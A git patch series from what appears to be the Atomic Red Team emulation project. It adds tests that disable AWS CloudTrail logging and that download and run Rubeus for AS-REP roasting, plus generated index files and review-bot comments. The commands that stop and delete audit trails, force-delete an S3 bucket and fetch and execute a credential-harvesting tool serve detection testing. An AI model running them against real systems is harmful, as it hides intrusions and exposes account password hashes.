@@ -16,7 +16,7 @@ | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy 
Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 2cd550c4..089d1b3c 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -32,7 +32,7 @@ | | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | 
[System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Protocol Tunneling](../../T1572/T1572.md) | | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Protocol Tunneling](../../T1572/T1572.md) | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Remote Access Software](../../T1219/T1219.md) | | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS 
Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Standard Encoding](../../T1132.001/T1132.001.md) | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a7d4214d..03b104ef 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -22565,7 +22565,50 @@ defense-evasion: - Matt Snyder, VMware x_mitre_platforms: - IaaS - atomic_tests: [] + identifier: T1562.008 + atomic_tests: + - name: AWS CloudTrail Changes + auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e + description: 'Creates a new cloudTrail in AWS, Upon successful creation it will + Update,Stop and Delete the cloudTrail + +' + supported_platforms: + - iaas:aws + input_arguments: + cloudtrail_name: + description: Name of the cloudTrail + type: String + default: redatomictesttrail + s3_bucket_name: + description: Name of the bucket + type: String + default: redatomic-test + region: + description: Name of the region + type: String + default: us-east-1 + dependencies: + - description: 'Check if ~/.aws/credentials file has a default stanza is configured + +' + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} + aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json + get_prereq_command: 'echo Please install the aws-cli and configure your AWS + defult profile using: aws configure + +' + executor: + command: | + aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} + aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} + aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} + aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} + cleanup_command: "aws s3 rb s3://#{s3_bucket_name} --force \n" + name: sh + elevation_required: false T1600.002: technique: id: attack-pattern--7efba77e-3bc4-4ca5-8292-d8201dcd64b5 diff --git a/atomics/T1562.008/T1562.008.md b/atomics/T1562.008/T1562.008.md new file mode 100644 index 00000000..1ab059ae --- /dev/null +++ b/atomics/T1562.008/T1562.008.md 
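Review bot: The prereq_command of the CloudTrail test is a setup step rather than a check — after `cat ~/.aws/credentials | grep "default"` it runs `aws s3api create-bucket` and `put-bucket-policy`, so every prerequisite evaluation creates resources, and the grep misses credentials supplied via environment variables, SSO or an instance role. Keep prereq_command side-effect free, e.g. `aws sts get-caller-identity && aws s3api head-bucket --bucket #{s3_bucket_name}`, and move the bucket creation and policy into get_prereq_command. Because the executor deletes the trail only as its last command, a failure at update-trail or stop-logging leaves a live trail writing into the bucket, after which `aws s3 rb --force` will fail to empty it (or, if the tester pointed s3_bucket_name at an existing bucket, will delete its contents); add `aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} 2>/dev/null` ahead of the rb in cleanup_command. This index appears to be regenerated by the docs/GUID job seen later in the series, so the change belongs in atomics/T1562.008/T1562.008.yaml rather than here.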
@@ -0,0 +1,67 @@ +# T1562.008 - Disable Cloud Logs +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/008) +
An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. + +Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)
+ +## Atomic Tests + +- [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes) + + +
+ +## Atomic Test #1 - AWS CloudTrail Changes +Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail + +**Supported Platforms:** Iaas:aws + + +**auto_generated_guid:** 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| cloudtrail_name | Name of the cloudTrail | String | redatomictesttrail| +| s3_bucket_name | Name of the bucket | String | redatomic-test| +| region | Name of the region | String | us-east-1| + + +#### Attack Commands: Run with `sh`! + + +```sh +aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region} +aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region} +aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region} +aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region} +``` + +#### Cleanup Commands: +```sh +aws s3 rb s3://#{s3_bucket_name} --force +``` + + + +#### Dependencies: Run with `sh`! +##### Description: Check if ~/.aws/credentials file has a default stanza is configured +##### Check Prereq Commands: +```sh +cat ~/.aws/credentials | grep "default" +aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region} +aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json +``` +##### Get Prereq Commands: +```sh +echo Please install the aws-cli and configure your AWS defult profile using: aws configure +``` + + + + +
From 39edc22a9f30692b165231add985f932f7e0cb71 Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Wed, 18 Aug 2021 16:17:01 -0500 Subject: [PATCH 22/39] T1558 rubeus (#1603) * intial rubeus test * update exe url * fix command strings * permalink, elevation, cleanup command Co-authored-by: Brandon Morgan Co-authored-by: Carrie Roberts --- atomics/T1558.004/T1558.004.yaml | 48 ++++++++++++++++++++++++++++++++ 1 file changed, 48 insertions(+) create mode 100644 atomics/T1558.004/T1558.004.yaml diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml new file mode 100644 index 00000000..5efff34e --- /dev/null +++ b/atomics/T1558.004/T1558.004.yaml 
@@ -0,0 +1,48 @@
+attack_technique: T1558.004
+display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
+atomic_tests:
+- name: Rubeus asreproast
+ description: |
+ Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+ This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
+ supported_platforms:
+ - windows
+ input_arguments:
+ local_folder:
+ description: Local path of Rubeus executable
+ type: Path
+ default: $Env:temp
+ local_executable:
+ description: name of the rubeus executable
+ type: String
+ default: 'rubeus.exe'
+ out_file:
+ description: file where command results are stored
+ type: String
+ default: rubeus_output.txt
+ rubeus_url:
+ description: URL of Rubeus executable
+ type: url
+ default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Computer must be domain joined
+ prereq_command: |
+ if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Write-Host Joining this computer to a domain must be done manually
+ - description: |
+ Rubeus must exist
+ prereq_command: |
+ if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+ executor:
+ command: |
+ cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+ cleanup_command: |
+ Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+ name: powershell
+ elevation_required: false
+
\ No newline at end of file
From f92bd6473f386e9a41e270fcff0f5df1d4df369f Mon Sep 17 00:00:00 2001
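Review bot: The second dependency's `get_prereq_command` fetches `Rubeus45.exe` with `Invoke-Webrequest`, and the `prereq_command` only checks `Test-Path` on `#{local_folder}\#{local_executable}`, so nothing confirms that the file the executor runs is the intended build rather than a tampered download or a stale file already sitting in `$Env:temp`. The URL is pinned to a commit, which helps, but a hash check in the prereq would close the gap, e.g. `if((Get-FileHash -Algorithm SHA256 "#{local_folder}\#{local_executable}").Hash -eq "<EXPECTED_SHA256>") {exit 0} else {exit 1}` with the expected value recorded next to `rubeus_url`. Separately, `cleanup_command` removes only `#{out_file}` and leaves the downloaded executable in `$Env:temp`; either add a second `Remove-Item` for it or state in the description that the binary persists after cleanup. Minor wording in the description: "it's creators" should be "its creators".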
From: CircleCI Atomic Red Team GUID generator Date: Wed, 18 Aug 2021 21:17:32 +0000 Subject: [PATCH 23/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
atomics/T1558.004/T1558.004.yaml | 1 +
atomics/used_guids.txt | 1 +
2 files changed, 2 insertions(+)
diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml
index 5efff34e..2b458c88 100644
--- a/atomics/T1558.004/T1558.004.yaml
+++ b/atomics/T1558.004/T1558.004.yaml
@@ -2,6 +2,7 @@ attack_technique: T1558.004
 display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
 atomic_tests:
 - name: Rubeus asreproast
+ auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
 description: |
 Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
 This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 4051f6a4..a8291305 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -763,3 +763,4 @@ eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
 aa6cb8c4-b582-4f8e-b677-37733914abda
 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+615bd568-2859-41b5-9aed-61f6a88e48dd
From 37ce8d9be85e187982a2bb0af1f7eb37de15aa58 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator Date: Wed, 18 Aug 2021 21:17:37 +0000 Subject: [PATCH 24/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
.../art-navigator-layer-windows.json | 2 +-
.../art-navigator-layer.json | 2 +-
atomics/Indexes/Indexes-CSV/index.csv | 1 +
atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
atomics/Indexes/Indexes-Markdown/index.md | 3 +-
.../Indexes/Indexes-Markdown/windows-index.md | 3 +-
atomics/Indexes/Matrices/matrix.md | 2 +-
atomics/Indexes/Matrices/windows-matrix.md | 2 +-
atomics/Indexes/index.yaml | 59 +++++++++++++-
atomics/T1558.004/T1558.004.md | 79 +++++++++++++++++++
10 files changed, 147 insertions(+), 7 deletions(-)
create mode 100644 atomics/T1558.004/T1558.004.md
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 606f3545..2dc3ea92 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T100
3/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,
"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"http
s://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanar
